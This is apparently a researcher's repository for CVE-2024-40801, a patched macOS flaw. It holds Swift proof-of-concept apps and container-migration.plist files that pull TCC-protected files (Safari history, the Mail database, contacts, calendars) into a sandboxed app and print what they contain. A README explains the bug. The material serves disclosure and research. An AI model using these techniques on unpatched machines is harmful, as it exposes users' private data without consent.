Scene { 13 | Window("App", id: "main") { 14 | ContentView() 15 | .frame(width: 250, height: 250) 16 | } 17 | .windowResizability(.contentSize) 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /Projects/ContainerMigrationExploit/AppSandbox.entitlements: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | com.apple.security.app-sandbox 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /Projects/ContainerMigrationExploit/Assets.xcassets/AccentColor.colorset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "colors" : [ 3 | { 4 | "idiom" : "universal" 5 | } 6 | ], 7 | "info" : { 8 | "author" : "xcode", 9 | "version" : 1 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /Projects/ContainerMigrationExploit/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "mac", 5 | "scale" : "1x", 6 | "size" : "16x16" 7 | }, 8 | { 9 | "idiom" : "mac", 10 | "scale" : "2x", 11 | "size" : "16x16" 12 | }, 13 | { 14 | "idiom" : "mac", 15 | "scale" : "1x", 16 | "size" : "32x32" 17 | }, 18 | { 19 | "idiom" : "mac", 20 | "scale" : "2x", 21 | "size" : "32x32" 22 | }, 23 | { 24 | "idiom" : "mac", 25 | "scale" : "1x", 26 | "size" : "128x128" 27 | }, 28 | { 29 | "idiom" : "mac", 30 | "scale" : "2x", 31 | "size" : "128x128" 32 | }, 33 | { 34 | "idiom" : "mac", 35 | "scale" : "1x", 36 | "size" : "256x256" 37 | }, 38 | { 39 | "idiom" : "mac", 40 | "scale" : "2x", 41 | "size" : "256x256" 42 | }, 43 | { 44 | "idiom" : "mac", 45 | "scale" : "1x", 46 | "size" : "512x512" 47 | }, 48 | { 49 | "idiom" : "mac", 50 | "scale" : "2x", 51 | "size" : "512x512" 52 | } 53 | ], 54 | "info" : { 55 | "author" : "xcode", 56 | "version" : 1 57 | } 58 | } 59 | -------------------------------------------------------------------------------- /Projects/ContainerMigrationExploit/Assets.xcassets/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /Projects/ContainerMigrationExploit/ContentView.swift: -------------------------------------------------------------------------------- 1 | // 2 | // ContentView.swift 3 | // ContainerMigrationExploit 4 | // 5 | // Created by Pedro José Pereira Vieito on 12/3/24. 6 | // 7 | 8 | import SwiftUI 9 | 10 | struct ContentView: View { 11 | var body: some View { 12 | VStack { 13 | Button { 14 | Task { 15 | let containerMigrationPlistURL = Bundle.main.url(forResource: "container-migration", withExtension: "plist")! 16 | let containerMigrationPlistData = try! Data(contentsOf: containerMigrationPlistURL) 17 | let containerMigrationPlist = try! PropertyListSerialization.propertyList(from: containerMigrationPlistData, format: nil) as! [String: [Any]] 18 | 19 | for itemPath in containerMigrationPlist["Move"]! { 20 | do { 21 | var itemPath = itemPath as? String ?? (itemPath as? [String])!.last! 22 | itemPath = itemPath.replacingOccurrences(of: "${Home}/", with: "") 23 | let secretFile = FileManager.default.homeDirectoryForCurrentUser.appendingPathComponent(itemPath) 24 | print("[!] Stealing item at “\(itemPath)” (from path: “\(secretFile.path)”)…") 25 | let secret = try Data(contentsOf: secretFile) 26 | print("[*] Content: \(secret)") 27 | } 28 | catch { 29 | print("[x] \(error.localizedDescription)") 30 | } 31 | } 32 | } 33 | } label: { 34 | Image(systemName: "globe") 35 | .imageScale(.large) 36 | .foregroundStyle(.tint) 37 | Text("Steal my secrets!") 38 | } 39 | } 40 | .padding() 41 | } 42 | } 43 | 44 | #Preview { 45 | ContentView() 46 | } 47 | -------------------------------------------------------------------------------- /Projects/ContainerMigrationExploit/container-migration.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Move 6 | 7 | ${Home}/Documents/.my-secret.txt 8 | ${Home}/Library/Containers/com.apple.mail/Data/Library/Mail/V10/MailData/recentSearches.plist 9 | ${Home}/Library/Safari/History.db 10 | 11 | ${Home}/Library/Application Support/AddressBook/AddressBook-v22.abcddb 12 | ${Home}/AddressBook-v22.abcddb 13 | 14 | 15 | ${Home}/Library/Calendars/Calendar.sqlitedb 16 | ${Home}/Calendar.sqlitedb 17 | 18 | 19 | 20 | 21 | -------------------------------------------------------------------------------- /Projects/MailContactsExploit.xcodeproj/project.pbxproj: -------------------------------------------------------------------------------- 1 | // !$*UTF8*$! 2 | { 3 | archiveVersion = 1; 4 | classes = { 5 | }; 6 | objectVersion = 56; 7 | objects = { 8 | 9 | /* Begin PBXBuildFile section */ 10 | AA6D8F742BA0D0A800C1A3C7 /* App.swift in Sources */ = {isa = PBXBuildFile; fileRef = AA6D8F732BA0D0A800C1A3C7 /* App.swift */; }; 11 | AA6D8F762BA0D0A800C1A3C7 /* ContentView.swift in Sources */ = {isa = PBXBuildFile; fileRef = AA6D8F752BA0D0A800C1A3C7 /* ContentView.swift */; }; 12 | AA6D8F782BA0D0AA00C1A3C7 /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = AA6D8F772BA0D0AA00C1A3C7 /* Assets.xcassets */; }; 13 | AA6D8F812BA0D0BD00C1A3C7 /* container-migration.plist in Resources */ = {isa = PBXBuildFile; fileRef = AA6D8F802BA0D0BD00C1A3C7 /* container-migration.plist */; }; 14 | AA6D8F852BA0D45A00C1A3C7 /* SQLite in Frameworks */ = {isa = PBXBuildFile; productRef = AA6D8F842BA0D45A00C1A3C7 /* SQLite */; }; 15 | /* End PBXBuildFile section */ 16 | 17 | /* Begin PBXFileReference section */ 18 | AA6D8F712BA0D0A800C1A3C7 /* MailContactsExploit.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = MailContactsExploit.app; sourceTree = BUILT_PRODUCTS_DIR; }; 19 | AA6D8F732BA0D0A800C1A3C7 /* App.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = App.swift; sourceTree = ""; }; 20 | AA6D8F752BA0D0A800C1A3C7 /* ContentView.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = ContentView.swift; sourceTree = ""; }; 21 | AA6D8F772BA0D0AA00C1A3C7 /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = ""; }; 22 | AA6D8F7C2BA0D0AA00C1A3C7 /* MailContactsExploit.entitlements */ = {isa = PBXFileReference; lastKnownFileType = text.plist.entitlements; path = MailContactsExploit.entitlements; sourceTree = ""; }; 23 | AA6D8F802BA0D0BD00C1A3C7 /* container-migration.plist */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.plist.xml; path = "container-migration.plist"; sourceTree = ""; }; 24 | /* End PBXFileReference section */ 25 | 26 | /* Begin PBXFrameworksBuildPhase section */ 27 | AA6D8F6E2BA0D0A800C1A3C7 /* Frameworks */ = { 28 | isa = PBXFrameworksBuildPhase; 29 | buildActionMask = 2147483647; 30 | files = ( 31 | AA6D8F852BA0D45A00C1A3C7 /* SQLite in Frameworks */, 32 | ); 33 | runOnlyForDeploymentPostprocessing = 0; 34 | }; 35 | /* End PBXFrameworksBuildPhase section */ 36 | 37 | /* Begin PBXGroup section */ 38 | AA6D8F392BA0842600C1A3C7 = { 39 | isa = PBXGroup; 40 | children = ( 41 | AA6D8F722BA0D0A800C1A3C7 /* MailContactsExploit */, 42 | AA6D8F432BA0842600C1A3C7 /* Products */, 43 | AA6D8F832BA0D45A00C1A3C7 /* Frameworks */, 44 | ); 45 | sourceTree = ""; 46 | }; 47 | AA6D8F432BA0842600C1A3C7 /* Products */ = { 48 | isa = PBXGroup; 49 | children = ( 50 | AA6D8F712BA0D0A800C1A3C7 /* MailContactsExploit.app */, 51 | ); 52 | name = Products; 53 | sourceTree = ""; 54 | }; 55 | AA6D8F722BA0D0A800C1A3C7 /* MailContactsExploit */ = { 56 | isa = PBXGroup; 57 | children = ( 58 | AA6D8F732BA0D0A800C1A3C7 /* App.swift */, 59 | AA6D8F752BA0D0A800C1A3C7 /* ContentView.swift */, 60 | AA6D8F802BA0D0BD00C1A3C7 /* container-migration.plist */, 61 | AA6D8F772BA0D0AA00C1A3C7 /* Assets.xcassets */, 62 | AA6D8F7C2BA0D0AA00C1A3C7 /* MailContactsExploit.entitlements */, 63 | ); 64 | path = MailContactsExploit; 65 | sourceTree = ""; 66 | }; 67 | AA6D8F832BA0D45A00C1A3C7 /* Frameworks */ = { 68 | isa = PBXGroup; 69 | children = ( 70 | ); 71 | name = Frameworks; 72 | sourceTree = ""; 73 | }; 74 | /* End PBXGroup section */ 75 | 76 | /* Begin PBXNativeTarget section */ 77 | AA6D8F702BA0D0A800C1A3C7 /* MailContactsExploit */ = { 78 | isa = PBXNativeTarget; 79 | buildConfigurationList = AA6D8F7F2BA0D0AA00C1A3C7 /* Build configuration list for PBXNativeTarget "MailContactsExploit" */; 80 | buildPhases = ( 81 | AA6D8F6D2BA0D0A800C1A3C7 /* Sources */, 82 | AA6D8F6E2BA0D0A800C1A3C7 /* Frameworks */, 83 | AA6D8F6F2BA0D0A800C1A3C7 /* Resources */, 84 | ); 85 | buildRules = ( 86 | ); 87 | dependencies = ( 88 | ); 89 | name = MailContactsExploit; 90 | packageProductDependencies = ( 91 | AA6D8F842BA0D45A00C1A3C7 /* SQLite */, 92 | ); 93 | productName = MailContactsExploit; 94 | productReference = AA6D8F712BA0D0A800C1A3C7 /* MailContactsExploit.app */; 95 | productType = "com.apple.product-type.application"; 96 | }; 97 | /* End PBXNativeTarget section */ 98 | 99 | /* Begin PBXProject section */ 100 | AA6D8F3A2BA0842600C1A3C7 /* Project object */ = { 101 | isa = PBXProject; 102 | attributes = { 103 | BuildIndependentTargetsInParallel = 1; 104 | LastSwiftUpdateCheck = 1530; 105 | LastUpgradeCheck = 1530; 106 | TargetAttributes = { 107 | AA6D8F702BA0D0A800C1A3C7 = { 108 | CreatedOnToolsVersion = 15.3; 109 | }; 110 | }; 111 | }; 112 | buildConfigurationList = AA6D8F3D2BA0842600C1A3C7 /* Build configuration list for PBXProject "MailContactsExploit" */; 113 | compatibilityVersion = "Xcode 14.0"; 114 | developmentRegion = en; 115 | hasScannedForEncodings = 0; 116 | knownRegions = ( 117 | en, 118 | Base, 119 | ); 120 | mainGroup = AA6D8F392BA0842600C1A3C7; 121 | packageReferences = ( 122 | AA6D8F822BA0D3A600C1A3C7 /* XCRemoteSwiftPackageReference "SQLite.swift" */, 123 | ); 124 | productRefGroup = AA6D8F432BA0842600C1A3C7 /* Products */; 125 | projectDirPath = ""; 126 | projectRoot = ""; 127 | targets = ( 128 | AA6D8F702BA0D0A800C1A3C7 /* MailContactsExploit */, 129 | ); 130 | }; 131 | /* End PBXProject section */ 132 | 133 | /* Begin PBXResourcesBuildPhase section */ 134 | AA6D8F6F2BA0D0A800C1A3C7 /* Resources */ = { 135 | isa = PBXResourcesBuildPhase; 136 | buildActionMask = 2147483647; 137 | files = ( 138 | AA6D8F812BA0D0BD00C1A3C7 /* container-migration.plist in Resources */, 139 | AA6D8F782BA0D0AA00C1A3C7 /* Assets.xcassets in Resources */, 140 | ); 141 | runOnlyForDeploymentPostprocessing = 0; 142 | }; 143 | /* End PBXResourcesBuildPhase section */ 144 | 145 | /* Begin PBXSourcesBuildPhase section */ 146 | AA6D8F6D2BA0D0A800C1A3C7 /* Sources */ = { 147 | isa = PBXSourcesBuildPhase; 148 | buildActionMask = 2147483647; 149 | files = ( 150 | AA6D8F762BA0D0A800C1A3C7 /* ContentView.swift in Sources */, 151 | AA6D8F742BA0D0A800C1A3C7 /* App.swift in Sources */, 152 | ); 153 | runOnlyForDeploymentPostprocessing = 0; 154 | }; 155 | /* End PBXSourcesBuildPhase section */ 156 | 157 | /* Begin XCBuildConfiguration section */ 158 | AA6D8F4F2BA0842800C1A3C7 /* Debug */ = { 159 | isa = XCBuildConfiguration; 160 | buildSettings = { 161 | ALWAYS_SEARCH_USER_PATHS = NO; 162 | ASSETCATALOG_COMPILER_GENERATE_SWIFT_ASSET_SYMBOL_EXTENSIONS = YES; 163 | CLANG_ANALYZER_NONNULL = YES; 164 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 165 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++20"; 166 | CLANG_ENABLE_MODULES = YES; 167 | CLANG_ENABLE_OBJC_ARC = YES; 168 | CLANG_ENABLE_OBJC_WEAK = YES; 169 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 170 | CLANG_WARN_BOOL_CONVERSION = YES; 171 | CLANG_WARN_COMMA = YES; 172 | CLANG_WARN_CONSTANT_CONVERSION = YES; 173 | CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES; 174 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 175 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 176 | CLANG_WARN_EMPTY_BODY = YES; 177 | CLANG_WARN_ENUM_CONVERSION = YES; 178 | CLANG_WARN_INFINITE_RECURSION = YES; 179 | CLANG_WARN_INT_CONVERSION = YES; 180 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 181 | CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES; 182 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 183 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 184 | CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER = YES; 185 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 186 | CLANG_WARN_STRICT_PROTOTYPES = YES; 187 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 188 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 189 | CLANG_WARN_UNREACHABLE_CODE = YES; 190 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 191 | COPY_PHASE_STRIP = NO; 192 | DEBUG_INFORMATION_FORMAT = dwarf; 193 | ENABLE_STRICT_OBJC_MSGSEND = YES; 194 | ENABLE_TESTABILITY = YES; 195 | ENABLE_USER_SCRIPT_SANDBOXING = YES; 196 | GCC_C_LANGUAGE_STANDARD = gnu17; 197 | GCC_DYNAMIC_NO_PIC = NO; 198 | GCC_NO_COMMON_BLOCKS = YES; 199 | GCC_OPTIMIZATION_LEVEL = 0; 200 | GCC_PREPROCESSOR_DEFINITIONS = ( 201 | "DEBUG=1", 202 | "$(inherited)", 203 | ); 204 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 205 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 206 | GCC_WARN_UNDECLARED_SELECTOR = YES; 207 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 208 | GCC_WARN_UNUSED_FUNCTION = YES; 209 | GCC_WARN_UNUSED_VARIABLE = YES; 210 | LOCALIZATION_PREFERS_STRING_CATALOGS = YES; 211 | MACOSX_DEPLOYMENT_TARGET = 14.4; 212 | MTL_ENABLE_DEBUG_INFO = INCLUDE_SOURCE; 213 | MTL_FAST_MATH = YES; 214 | ONLY_ACTIVE_ARCH = YES; 215 | SDKROOT = macosx; 216 | SWIFT_ACTIVE_COMPILATION_CONDITIONS = "DEBUG $(inherited)"; 217 | SWIFT_OPTIMIZATION_LEVEL = "-Onone"; 218 | }; 219 | name = Debug; 220 | }; 221 | AA6D8F502BA0842800C1A3C7 /* Release */ = { 222 | isa = XCBuildConfiguration; 223 | buildSettings = { 224 | ALWAYS_SEARCH_USER_PATHS = NO; 225 | ASSETCATALOG_COMPILER_GENERATE_SWIFT_ASSET_SYMBOL_EXTENSIONS = YES; 226 | CLANG_ANALYZER_NONNULL = YES; 227 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 228 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++20"; 229 | CLANG_ENABLE_MODULES = YES; 230 | CLANG_ENABLE_OBJC_ARC = YES; 231 | CLANG_ENABLE_OBJC_WEAK = YES; 232 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 233 | CLANG_WARN_BOOL_CONVERSION = YES; 234 | CLANG_WARN_COMMA = YES; 235 | CLANG_WARN_CONSTANT_CONVERSION = YES; 236 | CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES; 237 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 238 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 239 | CLANG_WARN_EMPTY_BODY = YES; 240 | CLANG_WARN_ENUM_CONVERSION = YES; 241 | CLANG_WARN_INFINITE_RECURSION = YES; 242 | CLANG_WARN_INT_CONVERSION = YES; 243 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 244 | CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES; 245 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 246 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 247 | CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER = YES; 248 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 249 | CLANG_WARN_STRICT_PROTOTYPES = YES; 250 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 251 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 252 | CLANG_WARN_UNREACHABLE_CODE = YES; 253 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 254 | COPY_PHASE_STRIP = NO; 255 | DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym"; 256 | ENABLE_NS_ASSERTIONS = NO; 257 | ENABLE_STRICT_OBJC_MSGSEND = YES; 258 | ENABLE_USER_SCRIPT_SANDBOXING = YES; 259 | GCC_C_LANGUAGE_STANDARD = gnu17; 260 | GCC_NO_COMMON_BLOCKS = YES; 261 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 262 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 263 | GCC_WARN_UNDECLARED_SELECTOR = YES; 264 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 265 | GCC_WARN_UNUSED_FUNCTION = YES; 266 | GCC_WARN_UNUSED_VARIABLE = YES; 267 | LOCALIZATION_PREFERS_STRING_CATALOGS = YES; 268 | MACOSX_DEPLOYMENT_TARGET = 14.4; 269 | MTL_ENABLE_DEBUG_INFO = NO; 270 | MTL_FAST_MATH = YES; 271 | SDKROOT = macosx; 272 | SWIFT_COMPILATION_MODE = wholemodule; 273 | }; 274 | name = Release; 275 | }; 276 | AA6D8F7D2BA0D0AA00C1A3C7 /* Debug */ = { 277 | isa = XCBuildConfiguration; 278 | buildSettings = { 279 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 280 | ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor; 281 | CODE_SIGN_ENTITLEMENTS = MailContactsExploit/MailContactsExploit.entitlements; 282 | CODE_SIGN_STYLE = Automatic; 283 | COMBINE_HIDPI_IMAGES = YES; 284 | CURRENT_PROJECT_VERSION = 1; 285 | DEVELOPMENT_TEAM = T7MC635YG5; 286 | ENABLE_HARDENED_RUNTIME = YES; 287 | ENABLE_PREVIEWS = YES; 288 | GENERATE_INFOPLIST_FILE = YES; 289 | INFOPLIST_KEY_NSHumanReadableCopyright = ""; 290 | LD_RUNPATH_SEARCH_PATHS = ( 291 | "$(inherited)", 292 | "@executable_path/../Frameworks", 293 | ); 294 | MARKETING_VERSION = 1.0; 295 | PRODUCT_BUNDLE_IDENTIFIER = com.pvieito.MailContactsExploit; 296 | PRODUCT_NAME = "$(TARGET_NAME)"; 297 | SWIFT_EMIT_LOC_STRINGS = YES; 298 | SWIFT_VERSION = 5.0; 299 | }; 300 | name = Debug; 301 | }; 302 | AA6D8F7E2BA0D0AA00C1A3C7 /* Release */ = { 303 | isa = XCBuildConfiguration; 304 | buildSettings = { 305 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 306 | ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor; 307 | CODE_SIGN_ENTITLEMENTS = MailContactsExploit/MailContactsExploit.entitlements; 308 | CODE_SIGN_STYLE = Automatic; 309 | COMBINE_HIDPI_IMAGES = YES; 310 | CURRENT_PROJECT_VERSION = 1; 311 | DEVELOPMENT_TEAM = T7MC635YG5; 312 | ENABLE_HARDENED_RUNTIME = YES; 313 | ENABLE_PREVIEWS = YES; 314 | GENERATE_INFOPLIST_FILE = YES; 315 | INFOPLIST_KEY_NSHumanReadableCopyright = ""; 316 | LD_RUNPATH_SEARCH_PATHS = ( 317 | "$(inherited)", 318 | "@executable_path/../Frameworks", 319 | ); 320 | MARKETING_VERSION = 1.0; 321 | PRODUCT_BUNDLE_IDENTIFIER = com.pvieito.MailContactsExploit; 322 | PRODUCT_NAME = "$(TARGET_NAME)"; 323 | SWIFT_EMIT_LOC_STRINGS = YES; 324 | SWIFT_VERSION = 5.0; 325 | }; 326 | name = Release; 327 | }; 328 | /* End XCBuildConfiguration section */ 329 | 330 | /* Begin XCConfigurationList section */ 331 | AA6D8F3D2BA0842600C1A3C7 /* Build configuration list for PBXProject "MailContactsExploit" */ = { 332 | isa = XCConfigurationList; 333 | buildConfigurations = ( 334 | AA6D8F4F2BA0842800C1A3C7 /* Debug */, 335 | AA6D8F502BA0842800C1A3C7 /* Release */, 336 | ); 337 | defaultConfigurationIsVisible = 0; 338 | defaultConfigurationName = Release; 339 | }; 340 | AA6D8F7F2BA0D0AA00C1A3C7 /* Build configuration list for PBXNativeTarget "MailContactsExploit" */ = { 341 | isa = XCConfigurationList; 342 | buildConfigurations = ( 343 | AA6D8F7D2BA0D0AA00C1A3C7 /* Debug */, 344 | AA6D8F7E2BA0D0AA00C1A3C7 /* Release */, 345 | ); 346 | defaultConfigurationIsVisible = 0; 347 | defaultConfigurationName = Release; 348 | }; 349 | /* End XCConfigurationList section */ 350 | 351 | /* Begin XCRemoteSwiftPackageReference section */ 352 | AA6D8F822BA0D3A600C1A3C7 /* XCRemoteSwiftPackageReference "SQLite.swift" */ = { 353 | isa = XCRemoteSwiftPackageReference; 354 | repositoryURL = "https://github.com/stephencelis/SQLite.swift.git"; 355 | requirement = { 356 | kind = upToNextMajorVersion; 357 | minimumVersion = 0.15.0; 358 | }; 359 | }; 360 | /* End XCRemoteSwiftPackageReference section */ 361 | 362 | /* Begin XCSwiftPackageProductDependency section */ 363 | AA6D8F842BA0D45A00C1A3C7 /* SQLite */ = { 364 | isa = XCSwiftPackageProductDependency; 365 | package = AA6D8F822BA0D3A600C1A3C7 /* XCRemoteSwiftPackageReference "SQLite.swift" */; 366 | productName = SQLite; 367 | }; 368 | /* End XCSwiftPackageProductDependency section */ 369 | }; 370 | rootObject = AA6D8F3A2BA0842600C1A3C7 /* Project object */; 371 | } 372 | -------------------------------------------------------------------------------- /Projects/MailContactsExploit.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Projects/MailContactsExploit.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | IDEDidComputeMac32BitWarning 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /Projects/MailContactsExploit.xcodeproj/project.xcworkspace/xcshareddata/swiftpm/Package.resolved: -------------------------------------------------------------------------------- 1 | { 2 | "originHash" : "96e0b2c5aa6295de957dc9d748d3b6d7a3925386507df9cee99ca8de309e3cf7", 3 | "pins" : [ 4 | { 5 | "identity" : "sqlite.swift", 6 | "kind" : "remoteSourceControl", 7 | "location" : "https://github.com/stephencelis/SQLite.swift.git", 8 | "state" : { 9 | "revision" : "e78ae0220e17525a15ac68c697a155eb7a672a8e", 10 | "version" : "0.15.0" 11 | } 12 | } 13 | ], 14 | "version" : 3 15 | } 16 | -------------------------------------------------------------------------------- /Projects/MailContactsExploit/App.swift: -------------------------------------------------------------------------------- 1 | // 2 | // App.swift 3 | // MailContactsExploit 4 | // 5 | // Created by Pedro José Pereira Vieito on 12/3/24. 6 | // 7 | 8 | import SwiftUI 9 | 10 | @main 11 | struct App: SwiftUI.App { 12 | var body: some Scene { 13 | Window("App", id: "main") { 14 | ContentView() 15 | .frame(width: 250, height: 250) 16 | } 17 | .windowResizability(.contentSize) 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /Projects/MailContactsExploit/Assets.xcassets/AccentColor.colorset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "colors" : [ 3 | { 4 | "idiom" : "universal" 5 | } 6 | ], 7 | "info" : { 8 | "author" : "xcode", 9 | "version" : 1 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /Projects/MailContactsExploit/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "mac", 5 | "scale" : "1x", 6 | "size" : "16x16" 7 | }, 8 | { 9 | "idiom" : "mac", 10 | "scale" : "2x", 11 | "size" : "16x16" 12 | }, 13 | { 14 | "idiom" : "mac", 15 | "scale" : "1x", 16 | "size" : "32x32" 17 | }, 18 | { 19 | "idiom" : "mac", 20 | "scale" : "2x", 21 | "size" : "32x32" 22 | }, 23 | { 24 | "idiom" : "mac", 25 | "scale" : "1x", 26 | "size" : "128x128" 27 | }, 28 | { 29 | "idiom" : "mac", 30 | "scale" : "2x", 31 | "size" : "128x128" 32 | }, 33 | { 34 | "idiom" : "mac", 35 | "scale" : "1x", 36 | "size" : "256x256" 37 | }, 38 | { 39 | "idiom" : "mac", 40 | "scale" : "2x", 41 | "size" : "256x256" 42 | }, 43 | { 44 | "idiom" : "mac", 45 | "scale" : "1x", 46 | "size" : "512x512" 47 | }, 48 | { 49 | "idiom" : "mac", 50 | "scale" : "2x", 51 | "size" : "512x512" 52 | } 53 | ], 54 | "info" : { 55 | "author" : "xcode", 56 | "version" : 1 57 | } 58 | } 59 | -------------------------------------------------------------------------------- /Projects/MailContactsExploit/Assets.xcassets/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /Projects/MailContactsExploit/ContentView.swift: -------------------------------------------------------------------------------- 1 | // 2 | // ContentView.swift 3 | // MailContactsExploit 4 | // 5 | // Created by Pedro José Pereira Vieito on 12/3/24. 6 | // 7 | 8 | import SwiftUI 9 | import SQLite 10 | 11 | struct ContentView: SwiftUI.View { 12 | var body: some SwiftUI.View { 13 | VStack { 14 | Button { 15 | Task { 16 | let containerMigrationPlistURL = Bundle.main.url(forResource: "container-migration", withExtension: "plist")! 17 | let containerMigrationPlistData = try! Data(contentsOf: containerMigrationPlistURL) 18 | let containerMigrationPlist = try! PropertyListSerialization.propertyList(from: containerMigrationPlistData, format: nil) as! [String: [String]] 19 | let itemPath = containerMigrationPlist["Move"]!.first!.replacingOccurrences(of: "${Home}/", with: "") 20 | let mailDatabase = FileManager.default.homeDirectoryForCurrentUser.appendingPathComponent(itemPath) 21 | 22 | do { 23 | print("[!] Loading Mail database at “\(mailDatabase.path)”)…") 24 | let db = try Connection(mailDatabase.path) 25 | 26 | let query = """ 27 | SELECT DISTINCT address 28 | FROM addresses 29 | ORDER BY 1 30 | """ 31 | for row in try db.prepare(query) { 32 | print("[*] \(row[0] ?? "--")") 33 | } 34 | } 35 | catch { 36 | print("[x] \(error.localizedDescription)") 37 | } 38 | } 39 | } label: { 40 | Image(systemName: "globe") 41 | .imageScale(.large) 42 | .foregroundStyle(.tint) 43 | Text("Steal my contacts!") 44 | } 45 | } 46 | .padding() 47 | } 48 | } 49 | 50 | #Preview { 51 | ContentView() 52 | } 53 | -------------------------------------------------------------------------------- /Projects/MailContactsExploit/MailContactsExploit.entitlements: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | com.apple.security.app-sandbox 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /Projects/MailContactsExploit/container-migration.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Move 6 | 7 | ${Home}/Library/Containers/com.apple.mail/Data/Library/Mail/V10/MailData/Envelope Index 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ContainerMigrationExploit 2 | 3 | You can find more info about this in [this blog post](http://pvieito.com/2024/09/cve-2024-40801). 4 | 5 | ### TL;DR 6 | 7 | The vulnerability `CVE-2024-40801` in macOS allowed a sandboxed app to bypass TCC protections and access sensitive user data without requiring user permission. By leveraging the [`container-migration.plist` feature](https://developer.apple.com/documentation/security/app_sandbox/migrating_your_app_s_files_to_its_app_sandbox_container#4098974), a sandboxed app could request the migration of TCC-protected files (like Safari history, Mail database, or user documents) to its app container, effectively bypassing TCC and giving the app full access to these files. This issue has since been fixed in [macOS Sonoma 14.7](https://support.apple.com/en-us/121247) and [macOS Sequoia 15.0](https://support.apple.com/en-us/121238). 8 | 9 | ### Projects 10 | 11 | This project includes multiple examples demonstrating this vulnerability. 12 | -------------------------------------------------------------------------------- /Scripts/ContainerMigrationExploitReset.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | set -x 4 | 5 | # Reset app-sandbox container: 6 | rm -rf ~/Library/Containers/com.pvieito.ContainerMigrationExploitApp/ 7 | rm -rf ~/Library/Containers/com.pvieito.CalendarExploit/ 8 | rm -rf ~/Library/Containers/com.pvieito.MailContactsExploit/ 9 | 10 | # Reset 